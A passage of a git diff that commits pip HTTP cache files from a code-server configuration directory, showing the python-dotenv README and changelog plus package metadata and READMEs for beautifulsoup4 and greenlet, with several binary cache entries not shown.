StringIO("USER=foo\nEMAIL=foo@example.org") +load_dotenv(stream=config) +``` + +### Load .env files in IPython + +You can use dotenv in IPython. By default, it will use `find_dotenv` to search for a +`.env` file: + +```python +%load_ext dotenv +%dotenv +``` + +You can also specify a path: + +```python +%dotenv relative/or/absolute/path/to/.env +``` + +Optional flags: + +- `-o` to override existing variables. +- `-v` for increased verbosity. + +### Disable load_dotenv + +Set `PYTHON_DOTENV_DISABLED=1` to disable `load_dotenv()` from loading .env files or streams. Useful when you can't modify third-party package calls or in production. + +## Command-line Interface + +A CLI interface `dotenv` is also included, which helps you manipulate the `.env` file +without manually opening it. + +```shell +$ pip install "python-dotenv[cli]" +$ dotenv set USER foo +$ dotenv set EMAIL foo@example.org +$ dotenv list +USER=foo +EMAIL=foo@example.org +$ dotenv list --format=json +{ + "USER": "foo", + "EMAIL": "foo@example.org" +} +$ dotenv run -- python foo.py +``` + +Run `dotenv --help` for more information about the options and subcommands. + +## File format + +The format is not formally specified and still improves over time. That being said, +`.env` files should mostly look like Bash files. + +Keys can be unquoted or single-quoted. Values can be unquoted, single- or double-quoted. +Spaces before and after keys, equal signs, and values are ignored. Values can be followed +by a comment. Lines can start with the `export` directive, which does not affect their +interpretation. + +Allowed escape sequences: + +- in single-quoted values: `\\`, `\'` +- in double-quoted values: `\\`, `\'`, `\"`, `\a`, `\b`, `\f`, `\n`, `\r`, `\t`, `\v` + +### Multiline values + +It is possible for single- or double-quoted values to span multiple lines. The following +examples are equivalent: + +```bash +FOO="first line +second line" +``` + +```bash +FOO="first line\nsecond line" +``` + +### Variable without a value + +A variable can have no value: + +```bash +FOO +``` + +It results in `dotenv_values` associating that variable name with the value `None` (e.g. +`{"FOO": None}`. `load_dotenv`, on the other hand, simply ignores such variables. + +This shouldn't be confused with `FOO=`, in which case the variable is associated with the +empty string. + +### Variable expansion + +python-dotenv can interpolate variables using POSIX variable expansion. + +With `load_dotenv(override=True)` or `dotenv_values()`, the value of a variable is the +first of the values defined in the following list: + +- Value of that variable in the `.env` file. +- Value of that variable in the environment. +- Default value, if provided. +- Empty string. + +With `load_dotenv(override=False)`, the value of a variable is the first of the values +defined in the following list: + +- Value of that variable in the environment. +- Value of that variable in the `.env` file. +- Default value, if provided. +- Empty string. + +## Related Projects + +- [Honcho](https://github.com/nickstenning/honcho) - For managing + Procfile-based applications. +- [django-dotenv](https://github.com/jpadilla/django-dotenv) +- [django-environ](https://github.com/joke2k/django-environ) +- [django-environ-2](https://github.com/sergeyklay/django-environ-2) +- [django-configuration](https://github.com/jezdez/django-configurations) +- [dump-env](https://github.com/sobolevn/dump-env) +- [environs](https://github.com/sloria/environs) +- [dynaconf](https://github.com/rochacbruno/dynaconf) +- [parse_it](https://github.com/naorlivne/parse_it) +- [python-decouple](https://github.com/HBNetwork/python-decouple) + +## Acknowledgements + +This project is currently maintained by [Saurabh Kumar](https://saurabh-kumar.com) and +[Bertrand Bonnefoy-Claudet](https://github.com/bbc2) and would not have been possible +without the support of these [awesome +people](https://github.com/theskumar/python-dotenv/graphs/contributors). + +[build_status_badge]: https://github.com/theskumar/python-dotenv/actions/workflows/test.yml/badge.svg +[build_status_link]: https://github.com/theskumar/python-dotenv/actions/workflows/test.yml +[pypi_badge]: https://badge.fury.io/py/python-dotenv.svg +[pypi_link]: https://badge.fury.io/py/python-dotenv +[python_streams]: https://docs.python.org/3/library/io.html + +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this +project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [1.2.1] - 2025-10-26 + +- Move more config to `pyproject.toml`, removed `setup.cfg` +- Add support for reading `.env` from FIFOs (Unix) by [@sidharth-sudhir] in [#586] + +## [1.2.0] - 2025-10-26 + +- Upgrade build system to use PEP 517 & PEP 518 to use `build` and `pyproject.toml` by [@EpicWink] in [#583] +- Add support for Python 3.14 by [@23f3001135] in [#579](https://github.com/theskumar/python-dotenv/pull/563) +- Add support for disabling of `load_dotenv()` using `PYTHON_DOTENV_DISABLED` env var. by [@matthewfranglen] in [#569] + +## [1.1.1] - 2025-06-24 + +### Fixed + +* CLI: Ensure `find_dotenv` work reliably on python 3.13 by [@theskumar] in [#563](https://github.com/theskumar/python-dotenv/pull/563) +* CLI: revert the use of execvpe on Windows by [@wrongontheinternet] in [#566](https://github.com/theskumar/python-dotenv/pull/566) + + +## [1.1.0] - 2025-03-25 + +**Feature** + +- Add support for python 3.13 +- Enhance `dotenv run`, switch to `execvpe` for better resource management and signal handling ([#523]) by [@eekstunt] + +**Fixed** + +- `find_dotenv` and `load_dotenv` now correctly looks up at the current directory when running in debugger or pdb ([#553] by [@randomseed42]) + +**Misc** + +- Drop support for Python 3.8 + +## [1.0.1] - 2024-01-23 + +**Fixed** + +* Gracefully handle code which has been imported from a zipfile ([#456] by [@samwyma]) +* Allow modules using `load_dotenv` to be reloaded when launched in a separate thread ([#497] by [@freddyaboulton]) +* Fix file not closed after deletion, handle error in the rewrite function ([#469] by [@Qwerty-133]) + +**Misc** +* Use pathlib.Path in tests ([#466] by [@eumiro]) +* Fix year in release date in changelog.md ([#454] by [@jankislinger]) +* Use https in README links ([#474] by [@Nicals]) + +## [1.0.0] - 2023-02-24 + +**Fixed** + +* Drop support for python 3.7, add python 3.12-dev (#449 by [@theskumar]) +* Handle situations where the cwd does not exist. (#446 by [@jctanner]) + +## [0.21.1] - 2023-01-21 + +**Added** + +* Use Python 3.11 non-beta in CI (#438 by [@bbc2]) +* Modernize variables code (#434 by [@Nougat-Waffle]) +* Modernize main.py and parser.py code (#435 by [@Nougat-Waffle]) +* Improve conciseness of cli.py and __init__.py (#439 by [@Nougat-Waffle]) +* Improve error message for `get` and `list` commands when env file can't be opened (#441 by [@bbc2]) +* Updated License to align with BSD OSI template (#433 by [@lsmith77]) + + +**Fixed** + +* Fix Out-of-scope error when "dest" variable is undefined (#413 by [@theGOTOguy]) +* Fix IPython test warning about deprecated `magic` (#440 by [@bbc2]) +* Fix type hint for dotenv_path var, add StrPath alias (#432 by [@eaf]) + +## [0.21.0] - 2022-09-03 + +**Added** + +* CLI: add support for invocations via 'python -m'. (#395 by [@theskumar]) +* `load_dotenv` function now returns `False`. (#388 by [@larsks]) +* CLI: add --format= option to list command. (#407 by [@sammck]) + +**Fixed** + +* Drop Python 3.5 and 3.6 and upgrade GA (#393 by [@eggplants]) +* Use `open` instead of `io.open`. (#389 by [@rabinadk1]) +* Improve documentation for variables without a value (#390 by [@bbc2]) +* Add `parse_it` to Related Projects (#410 by [@naorlivne]) +* Update README.md (#415 by [@harveer07]) +* Improve documentation with direct use of MkDocs (#398 by [@bbc2]) + +## [0.20.0] - 2022-03-24 + +**Added** + +- Add `encoding` (`Optional[str]`) parameter to `get_key`, `set_key` and `unset_key`. + (#379 by [@bbc2]) + +**Fixed** + +- Use dict to specify the `entry_points` parameter of `setuptools.setup` (#376 by + [@mgorny]). +- Don't build universal wheels (#387 by [@bbc2]). + +## [0.19.2] - 2021-11-11 + +**Fixed** + +- In `set_key`, add missing newline character before new entry if necessary. (#361 by + [@bbc2]) + +## [0.19.1] - 2021-08-09 + +**Added** + +- Add support for Python 3.10. (#359 by [@theskumar]) + +## [0.19.0] - 2021-07-24 + +**Changed** + +- Require Python 3.5 or a later version. Python 2 and 3.4 are no longer supported. (#341 + by [@bbc2]). + +**Added** + +- The `dotenv_path` argument of `set_key` and `unset_key` now has a type of `Union[str, + os.PathLike]` instead of just `os.PathLike` (#347 by [@bbc2]). +- The `stream` argument of `load_dotenv` and `dotenv_values` can now be a text stream + (`IO[str]`), which includes values like `io.StringIO("foo")` and `open("file.env", + "r")` (#348 by [@bbc2]). + +## [0.18.0] - 2021-06-20 + +**Changed** + +- Raise `ValueError` if `quote_mode` isn't one of `always`, `auto` or `never` in + `set_key` (#330 by [@bbc2]). +- When writing a value to a .env file with `set_key` or `dotenv set ` (#330 + by [@bbc2]): + - Use single quotes instead of double quotes. + - Don't strip surrounding quotes. + - In `auto` mode, don't add quotes if the value is only made of alphanumeric characters + (as determined by `string.isalnum`). + +## [0.17.1] - 2021-04-29 + +**Fixed** + +- Fixed tests for build environments relying on `PYTHONPATH` (#318 by [@befeleme]). + +## [0.17.0] - 2021-04-02 + +**Changed** + +- Make `dotenv get ` only show the value, not `key=value` (#313 by [@bbc2]). + +**Added** + +- Add `--override`/`--no-override` option to `dotenv run` (#312 by [@zueve] and [@bbc2]). + +## [0.16.0] - 2021-03-27 + +**Changed** + +- The default value of the `encoding` parameter for `load_dotenv` and `dotenv_values` is + now `"utf-8"` instead of `None` (#306 by [@bbc2]). +- Fix resolution order in variable expansion with `override=False` (#287 by [@bbc2]). + +## [0.15.0] - 2020-10-28 + +**Added** + +- Add `--export` option to `set` to make it prepend the binding with `export` (#270 by + [@jadutter]). + +**Changed** + +- Make `set` command create the `.env` file in the current directory if no `.env` file was + found (#270 by [@jadutter]). + +**Fixed** + +- Fix potentially empty expanded value for duplicate key (#260 by [@bbc2]). +- Fix import error on Python 3.5.0 and 3.5.1 (#267 by [@gongqingkui]). +- Fix parsing of unquoted values containing several adjacent space or tab characters + (#277 by [@bbc2], review by [@x-yuri]). + +## [0.14.0] - 2020-07-03 + +**Changed** + +- Privilege definition in file over the environment in variable expansion (#256 by + [@elbehery95]). + +**Fixed** + +- Improve error message for when file isn't found (#245 by [@snobu]). +- Use HTTPS URL in package meta data (#251 by [@ekohl]). + +## [0.13.0] - 2020-04-16 + +**Added** + +- Add support for a Bash-like default value in variable expansion (#248 by [@bbc2]). + +## [0.12.0] - 2020-02-28 + +**Changed** + +- Use current working directory to find `.env` when bundled by PyInstaller (#213 by + [@gergelyk]). + +**Fixed** + +- Fix escaping of quoted values written by `set_key` (#236 by [@bbc2]). +- Fix `dotenv run` crashing on environment variables without values (#237 by [@yannham]). +- Remove warning when last line is empty (#238 by [@bbc2]). + +## [0.11.0] - 2020-02-07 + +**Added** + +- Add `interpolate` argument to `load_dotenv` and `dotenv_values` to disable interpolation + (#232 by [@ulyssessouza]). + +**Changed** + +- Use logging instead of warnings (#231 by [@bbc2]). + +**Fixed** + +- Fix installation in non-UTF-8 environments (#225 by [@altendky]). +- Fix PyPI classifiers (#228 by [@bbc2]). + +## [0.10.5] - 2020-01-19 + +**Fixed** + +- Fix handling of malformed lines and lines without a value (#222 by [@bbc2]): + - Don't print warning when key has no value. + - Reject more malformed lines (e.g. "A: B", "a='b',c"). +- Fix handling of lines with just a comment (#224 by [@bbc2]). + +## [0.10.4] - 2020-01-17 + +**Added** + +- Make typing optional (#179 by [@techalchemy]). +- Print a warning on malformed line (#211 by [@bbc2]). +- Support keys without a value (#220 by [@ulyssessouza]). + +## 0.10.3 + +- Improve interactive mode detection ([@andrewsmith])([#183]). +- Refactor parser to fix parsing inconsistencies ([@bbc2])([#170]). + - Interpret escapes as control characters only in double-quoted strings. + - Interpret `#` as start of comment only if preceded by whitespace. + +## 0.10.2 + +- Add type hints and expose them to users ([@qnighy])([#172]) +- `load_dotenv` and `dotenv_values` now accept an `encoding` parameter, defaults to `None` + ([@theskumar])([@earlbread])([#161]) +- Fix `str`/`unicode` inconsistency in Python 2: values are always `str` now. ([@bbc2])([#121]) +- Fix Unicode error in Python 2, introduced in 0.10.0. ([@bbc2])([#176]) + +## 0.10.1 +- Fix parsing of variable without a value ([@asyncee])([@bbc2])([#158]) + +## 0.10.0 + +- Add support for UTF-8 in unquoted values ([@bbc2])([#148]) +- Add support for trailing comments ([@bbc2])([#148]) +- Add backslashes support in values ([@bbc2])([#148]) +- Add support for newlines in values ([@bbc2])([#148]) +- Force environment variables to str with Python2 on Windows ([@greyli]) +- Drop Python 3.3 support ([@greyli]) +- Fix stderr/-out/-in redirection ([@venthur]) + + +## 0.9.0 + +- Add `--version` parameter to cli ([@venthur]) +- Enable loading from current directory ([@cjauvin]) +- Add 'dotenv run' command for calling arbitrary shell script with .env ([@venthur]) + +## 0.8.1 + +- Add tests for docs ([@Flimm]) +- Make 'cli' support optional. Use `pip install python-dotenv[cli]`. ([@theskumar]) + +## 0.8.0 + +- `set_key` and `unset_key` only modified the affected file instead of + parsing and re-writing file, this causes comments and other file + entact as it is. +- Add support for `export` prefix in the line. +- Internal refractoring ([@theskumar]) +- Allow `load_dotenv` and `dotenv_values` to work with `StringIO())` ([@alanjds])([@theskumar])([#78]) + +## 0.7.1 + +- Remove hard dependency on iPython ([@theskumar]) + +## 0.7.0 + +- Add support to override system environment variable via .env. + ([@milonimrod](https://github.com/milonimrod)) + ([\#63](https://github.com/theskumar/python-dotenv/issues/63)) +- Disable ".env not found" warning by default + ([@maxkoryukov](https://github.com/maxkoryukov)) + ([\#57](https://github.com/theskumar/python-dotenv/issues/57)) + +## 0.6.5 + +- Add support for special characters `\`. + ([@pjona](https://github.com/pjona)) + ([\#60](https://github.com/theskumar/python-dotenv/issues/60)) + +## 0.6.4 + +- Fix issue with single quotes ([@Flimm]) + ([\#52](https://github.com/theskumar/python-dotenv/issues/52)) + +## 0.6.3 + +- Handle unicode exception in setup.py + ([\#46](https://github.com/theskumar/python-dotenv/issues/46)) + +## 0.6.2 + +- Fix dotenv list command ([@ticosax](https://github.com/ticosax)) +- Add iPython Support + ([@tillahoffmann](https://github.com/tillahoffmann)) + +## 0.6.0 + +- Drop support for Python 2.6 +- Handle escaped characters and newlines in quoted values. (Thanks + [@iameugenejo](https://github.com/iameugenejo)) +- Remove any spaces around unquoted key/value. (Thanks + [@paulochf](https://github.com/paulochf)) +- Added POSIX variable expansion. (Thanks + [@hugochinchilla](https://github.com/hugochinchilla)) + +## 0.5.1 + +- Fix `find_dotenv` - it now start search from the file where this + function is called from. + +## 0.5.0 + +- Add `find_dotenv` method that will try to find a `.env` file. + (Thanks [@isms](https://github.com/isms)) + +## 0.4.0 + +- cli: Added `-q/--quote` option to control the behaviour of quotes + around values in `.env`. (Thanks + [@hugochinchilla](https://github.com/hugochinchilla)). +- Improved test coverage. + + +[#78]: https://github.com/theskumar/python-dotenv/issues/78 +[#121]: https://github.com/theskumar/python-dotenv/issues/121 +[#148]: https://github.com/theskumar/python-dotenv/issues/148 +[#158]: https://github.com/theskumar/python-dotenv/issues/158 +[#170]: https://github.com/theskumar/python-dotenv/issues/170 +[#172]: https://github.com/theskumar/python-dotenv/issues/172 +[#176]: https://github.com/theskumar/python-dotenv/issues/176 +[#183]: https://github.com/theskumar/python-dotenv/issues/183 +[#359]: https://github.com/theskumar/python-dotenv/issues/359 +[#469]: https://github.com/theskumar/python-dotenv/issues/469 +[#456]: https://github.com/theskumar/python-dotenv/issues/456 +[#466]: https://github.com/theskumar/python-dotenv/issues/466 +[#454]: https://github.com/theskumar/python-dotenv/issues/454 +[#474]: https://github.com/theskumar/python-dotenv/issues/474 +[#523]: https://github.com/theskumar/python-dotenv/issues/523 +[#553]: https://github.com/theskumar/python-dotenv/issues/553 +[#569]: https://github.com/theskumar/python-dotenv/issues/569 +[#583]: https://github.com/theskumar/python-dotenv/issues/583 +[#586]: https://github.com/theskumar/python-dotenv/issues/586 + + +[@23f3001135]: https://github.com/23f3001135 +[@EpicWink]: https://github.com/EpicWink +[@Flimm]: https://github.com/Flimm +[@Nicals]: https://github.com/Nicals +[@Nougat-Waffle]: https://github.com/Nougat-Waffle +[@Qwerty-133]: https://github.com/Qwerty-133 +[@alanjds]: https://github.com/alanjds +[@altendky]: https://github.com/altendky +[@andrewsmith]: https://github.com/andrewsmith +[@asyncee]: https://github.com/asyncee +[@bbc2]: https://github.com/bbc2 +[@befeleme]: https://github.com/befeleme +[@cjauvin]: https://github.com/cjauvin +[@eaf]: https://github.com/eaf +[@earlbread]: https://github.com/earlbread +[@eekstunt]: https://github.com/eekstunt +[@eggplants]: https://github.com/@eggplants +[@ekohl]: https://github.com/ekohl +[@elbehery95]: https://github.com/elbehery95 +[@eumiro]: https://github.com/eumiro +[@freddyaboulton]: https://github.com/freddyaboulton +[@gergelyk]: https://github.com/gergelyk +[@gongqingkui]: https://github.com/gongqingkui +[@greyli]: https://github.com/greyli +[@harveer07]: https://github.com/@harveer07 +[@jadutter]: https://github.com/jadutter +[@jankislinger]: https://github.com/jankislinger +[@jctanner]: https://github.com/jctanner +[@larsks]: https://github.com/@larsks +[@lsmith77]: https://github.com/lsmith77 +[@matthewfranglen]: https://github.com/matthewfranglen +[@mgorny]: https://github.com/mgorny +[@naorlivne]: https://github.com/@naorlivne +[@qnighy]: https://github.com/qnighy +[@rabinadk1]: https://github.com/@rabinadk1 +[@randomseed42]: https://github.com/zueve +[@sammck]: https://github.com/@sammck +[@samwyma]: https://github.com/samwyma +[@sidharth-sudhir]: https://github.com/sidharth-sudhir +[@snobu]: https://github.com/snobu +[@techalchemy]: https://github.com/techalchemy +[@theGOTOguy]: https://github.com/theGOTOguy +[@theskumar]: https://github.com/theskumar +[@ulyssessouza]: https://github.com/ulyssessouza +[@venthur]: https://github.com/venthur +[@wrongontheinternet]: https://github.com/wrongontheinternet +[@x-yuri]: https://github.com/x-yuri +[@yannham]: https://github.com/yannham +[@zueve]: https://github.com/zueve + +[Unreleased]: https://github.com/theskumar/python-dotenv/compare/v1.2.0...HEAD +[1.2.0]: https://github.com/theskumar/python-dotenv/compare/v1.1.1...v1.2.0 +[1.1.1]: https://github.com/theskumar/python-dotenv/compare/v1.1.0...v1.1.1 +[1.1.0]: https://github.com/theskumar/python-dotenv/compare/v1.0.1...v1.1.0 +[1.0.1]: https://github.com/theskumar/python-dotenv/compare/v1.0.0...v1.0.1 +[1.0.0]: https://github.com/theskumar/python-dotenv/compare/v0.21.0...v1.0.0 +[0.21.1]: https://github.com/theskumar/python-dotenv/compare/v0.21.0...v0.21.1 +[0.21.0]: https://github.com/theskumar/python-dotenv/compare/v0.20.0...v0.21.0 +[0.20.0]: https://github.com/theskumar/python-dotenv/compare/v0.19.2...v0.20.0 +[0.19.2]: https://github.com/theskumar/python-dotenv/compare/v0.19.1...v0.19.2 +[0.19.1]: https://github.com/theskumar/python-dotenv/compare/v0.19.0...v0.19.1 +[0.19.0]: https://github.com/theskumar/python-dotenv/compare/v0.18.0...v0.19.0 +[0.18.0]: https://github.com/theskumar/python-dotenv/compare/v0.17.1...v0.18.0 +[0.17.1]: https://github.com/theskumar/python-dotenv/compare/v0.17.0...v0.17.1 +[0.17.0]: https://github.com/theskumar/python-dotenv/compare/v0.16.0...v0.17.0 +[0.16.0]: https://github.com/theskumar/python-dotenv/compare/v0.15.0...v0.16.0 +[0.15.0]: https://github.com/theskumar/python-dotenv/compare/v0.14.0...v0.15.0 +[0.14.0]: https://github.com/theskumar/python-dotenv/compare/v0.13.0...v0.14.0 +[0.13.0]: https://github.com/theskumar/python-dotenv/compare/v0.12.0...v0.13.0 +[0.12.0]: https://github.com/theskumar/python-dotenv/compare/v0.11.0...v0.12.0 +[0.11.0]: https://github.com/theskumar/python-dotenv/compare/v0.10.5...v0.11.0 +[0.10.5]: https://github.com/theskumar/python-dotenv/compare/v0.10.4...v0.10.5 +[0.10.4]: https://github.com/theskumar/python-dotenv/compare/v0.10.3...v0.10.4 diff --git a/code-server-config/.cache/pip/http-v2/a/b/d/d/d/abdddc46265b81c7d6dc73a20f1ad8ef043a66e9e79abdc1379bf71e b/code-server-config/.cache/pip/http-v2/a/b/d/d/d/abdddc46265b81c7d6dc73a20f1ad8ef043a66e9e79abdc1379bf71e new file mode 100755 index 0000000..6519b65 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/a/b/d/d/d/abdddc46265b81c7d6dc73a20f1ad8ef043a66e9e79abdc1379bf71e differ diff --git a/code-server-config/.cache/pip/http-v2/a/b/d/d/d/abdddc46265b81c7d6dc73a20f1ad8ef043a66e9e79abdc1379bf71e.body b/code-server-config/.cache/pip/http-v2/a/b/d/d/d/abdddc46265b81c7d6dc73a20f1ad8ef043a66e9e79abdc1379bf71e.body new file mode 100755 index 0000000..bcd4691 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/a/b/d/d/d/abdddc46265b81c7d6dc73a20f1ad8ef043a66e9e79abdc1379bf71e.body differ diff --git a/code-server-config/.cache/pip/http-v2/a/e/5/f/a/ae5faffb20c18d03a8d32e103e2a7344328d8d276566417eca03d0d7 b/code-server-config/.cache/pip/http-v2/a/e/5/f/a/ae5faffb20c18d03a8d32e103e2a7344328d8d276566417eca03d0d7 new file mode 100755 index 0000000..68a9f50 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/a/e/5/f/a/ae5faffb20c18d03a8d32e103e2a7344328d8d276566417eca03d0d7 differ diff --git a/code-server-config/.cache/pip/http-v2/a/e/5/f/a/ae5faffb20c18d03a8d32e103e2a7344328d8d276566417eca03d0d7.body b/code-server-config/.cache/pip/http-v2/a/e/5/f/a/ae5faffb20c18d03a8d32e103e2a7344328d8d276566417eca03d0d7.body new file mode 100755 index 0000000..744af97 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/a/e/5/f/a/ae5faffb20c18d03a8d32e103e2a7344328d8d276566417eca03d0d7.body differ diff --git a/code-server-config/.cache/pip/http-v2/b/8/0/2/b/b802bf744f29add6cd6c7e4d8b0a9da659981b9f2631696f1ff03c30 b/code-server-config/.cache/pip/http-v2/b/8/0/2/b/b802bf744f29add6cd6c7e4d8b0a9da659981b9f2631696f1ff03c30 new file mode 100755 index 0000000..f379e3c Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/b/8/0/2/b/b802bf744f29add6cd6c7e4d8b0a9da659981b9f2631696f1ff03c30 differ diff --git a/code-server-config/.cache/pip/http-v2/b/8/0/2/b/b802bf744f29add6cd6c7e4d8b0a9da659981b9f2631696f1ff03c30.body b/code-server-config/.cache/pip/http-v2/b/8/0/2/b/b802bf744f29add6cd6c7e4d8b0a9da659981b9f2631696f1ff03c30.body new file mode 100755 index 0000000..7fd97b7 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/b/8/0/2/b/b802bf744f29add6cd6c7e4d8b0a9da659981b9f2631696f1ff03c30.body @@ -0,0 +1,123 @@ +Metadata-Version: 2.4 +Name: beautifulsoup4 +Version: 4.14.3 +Summary: Screen-scraping library +Project-URL: Download, https://www.crummy.com/software/BeautifulSoup/bs4/download/ +Project-URL: Homepage, https://www.crummy.com/software/BeautifulSoup/bs4/ +Author-email: Leonard Richardson +License: MIT License +License-File: AUTHORS +License-File: LICENSE +Keywords: HTML,XML,parse,soup +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Topic :: Text Processing :: Markup :: HTML +Classifier: Topic :: Text Processing :: Markup :: SGML +Classifier: Topic :: Text Processing :: Markup :: XML +Requires-Python: >=3.7.0 +Requires-Dist: soupsieve>=1.6.1 +Requires-Dist: typing-extensions>=4.0.0 +Provides-Extra: cchardet +Requires-Dist: cchardet; extra == 'cchardet' +Provides-Extra: chardet +Requires-Dist: chardet; extra == 'chardet' +Provides-Extra: charset-normalizer +Requires-Dist: charset-normalizer; extra == 'charset-normalizer' +Provides-Extra: html5lib +Requires-Dist: html5lib; extra == 'html5lib' +Provides-Extra: lxml +Requires-Dist: lxml; extra == 'lxml' +Description-Content-Type: text/markdown + +Beautiful Soup is a library that makes it easy to scrape information +from web pages. It sits atop an HTML or XML parser, providing Pythonic +idioms for iterating, searching, and modifying the parse tree. + +# Quick start + +``` +>>> from bs4 import BeautifulSoup +>>> soup = BeautifulSoup("

SomebadHTML") +>>> print(soup.prettify()) + + +

+ Some + + bad + + HTML + + +

+ + +>>> soup.find(string="bad") +'bad' +>>> soup.i +HTML +# +>>> soup = BeautifulSoup("SomebadXML", "xml") +# +>>> print(soup.prettify()) + + + Some + + bad + + XML + + +``` + +To go beyond the basics, [comprehensive documentation is available](https://www.crummy.com/software/BeautifulSoup/bs4/doc/). + +# Links + +* [Homepage](https://www.crummy.com/software/BeautifulSoup/bs4/) +* [Documentation](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) +* [Discussion group](https://groups.google.com/group/beautifulsoup/) +* [Development](https://code.launchpad.net/beautifulsoup/) +* [Bug tracker](https://bugs.launchpad.net/beautifulsoup/) +* [Complete changelog](https://git.launchpad.net/beautifulsoup/tree/CHANGELOG) + +# Note on Python 2 sunsetting + +Beautiful Soup's support for Python 2 was discontinued on December 31, +2020: one year after the sunset date for Python 2 itself. From this +point onward, new Beautiful Soup development will exclusively target +Python 3. The final release of Beautiful Soup 4 to support Python 2 +was 4.9.3. + +# Supporting the project + +If you use Beautiful Soup as part of your professional work, please consider a +[Tidelift subscription](https://tidelift.com/subscription/pkg/pypi-beautifulsoup4?utm_source=pypi-beautifulsoup4&utm_medium=referral&utm_campaign=readme). +This will support many of the free software projects your organization +depends on, not just Beautiful Soup. + +If you use Beautiful Soup for personal projects, the best way to say +thank you is to read +[Tool Safety](https://www.crummy.com/software/BeautifulSoup/zine/), a zine I +wrote about what Beautiful Soup has taught me about software +development. + +# Building the documentation + +The bs4/doc/ directory contains full documentation in Sphinx +format. Run `make html` in that directory to create HTML +documentation. + +# Running the unit tests + +Beautiful Soup supports unit test discovery using Pytest: + +``` +$ pytest +``` + diff --git a/code-server-config/.cache/pip/http-v2/d/6/b/5/a/d6b5a680d6bd64b15d21710b790a7149c0cb6150e5b7d7a0964e2d8b b/code-server-config/.cache/pip/http-v2/d/6/b/5/a/d6b5a680d6bd64b15d21710b790a7149c0cb6150e5b7d7a0964e2d8b new file mode 100755 index 0000000..68cbc43 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/d/6/b/5/a/d6b5a680d6bd64b15d21710b790a7149c0cb6150e5b7d7a0964e2d8b differ diff --git a/code-server-config/.cache/pip/http-v2/d/6/b/5/a/d6b5a680d6bd64b15d21710b790a7149c0cb6150e5b7d7a0964e2d8b.body b/code-server-config/.cache/pip/http-v2/d/6/b/5/a/d6b5a680d6bd64b15d21710b790a7149c0cb6150e5b7d7a0964e2d8b.body new file mode 100755 index 0000000..550a670 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/d/6/b/5/a/d6b5a680d6bd64b15d21710b790a7149c0cb6150e5b7d7a0964e2d8b.body @@ -0,0 +1,117 @@ +Metadata-Version: 2.4 +Name: greenlet +Version: 3.3.0 +Summary: Lightweight in-process concurrent programming +Home-page: https://greenlet.readthedocs.io/ +Author: Alexey Borzenkov +Author-email: snaury@gmail.com +Maintainer: Jason Madden +Maintainer-email: jason@seecoresoftware.com +License: MIT AND Python-2.0 +Project-URL: Bug Tracker, https://github.com/python-greenlet/greenlet/issues +Project-URL: Source Code, https://github.com/python-greenlet/greenlet/ +Project-URL: Documentation, https://greenlet.readthedocs.io/ +Project-URL: Changes, https://greenlet.readthedocs.io/en/latest/changes.html +Keywords: greenlet coroutine concurrency threads cooperative +Platform: any +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Natural Language :: English +Classifier: Programming Language :: C +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Classifier: Operating System :: OS Independent +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Requires-Python: >=3.10 +Description-Content-Type: text/x-rst +License-File: LICENSE +License-File: LICENSE.PSF +Provides-Extra: docs +Requires-Dist: Sphinx; extra == "docs" +Requires-Dist: furo; extra == "docs" +Provides-Extra: test +Requires-Dist: objgraph; extra == "test" +Requires-Dist: psutil; extra == "test" +Requires-Dist: setuptools; extra == "test" +Dynamic: author +Dynamic: author-email +Dynamic: classifier +Dynamic: description +Dynamic: description-content-type +Dynamic: home-page +Dynamic: keywords +Dynamic: license +Dynamic: license-file +Dynamic: maintainer +Dynamic: maintainer-email +Dynamic: platform +Dynamic: project-url +Dynamic: provides-extra +Dynamic: requires-python +Dynamic: summary + +.. This file is included into docs/history.rst + + +Greenlets are lightweight coroutines for in-process concurrent +programming. + +The "greenlet" package is a spin-off of `Stackless`_, a version of +CPython that supports micro-threads called "tasklets". Tasklets run +pseudo-concurrently (typically in a single or a few OS-level threads) +and are synchronized with data exchanges on "channels". + +A "greenlet", on the other hand, is a still more primitive notion of +micro-thread with no implicit scheduling; coroutines, in other words. +This is useful when you want to control exactly when your code runs. +You can build custom scheduled micro-threads on top of greenlet; +however, it seems that greenlets are useful on their own as a way to +make advanced control flow structures. For example, we can recreate +generators; the difference with Python's own generators is that our +generators can call nested functions and the nested functions can +yield values too. (Additionally, you don't need a "yield" keyword. See +the example in `test_generator.py +`_). + +Greenlets are provided as a C extension module for the regular unmodified +interpreter. + +.. _`Stackless`: http://www.stackless.com + + +Who is using Greenlet? +====================== + +There are several libraries that use Greenlet as a more flexible +alternative to Python's built in coroutine support: + + - `Concurrence`_ + - `Eventlet`_ + - `Gevent`_ + +.. _Concurrence: http://opensource.hyves.org/concurrence/ +.. _Eventlet: http://eventlet.net/ +.. _Gevent: http://www.gevent.org/ + +Getting Greenlet +================ + +The easiest way to get Greenlet is to install it with pip:: + + pip install greenlet + + +Source code archives and binary distributions are available on the +python package index at https://pypi.org/project/greenlet + +The source code repository is hosted on github: +https://github.com/python-greenlet/greenlet + +Documentation is available on readthedocs.org: +https://greenlet.readthedocs.io diff --git a/code-server-config/.cache/pip/http-v2/d/b/4/f/1/db4f1a46f0bc9bac065fd35cdbe1c65d030e9fd9ca59d06fa230106f 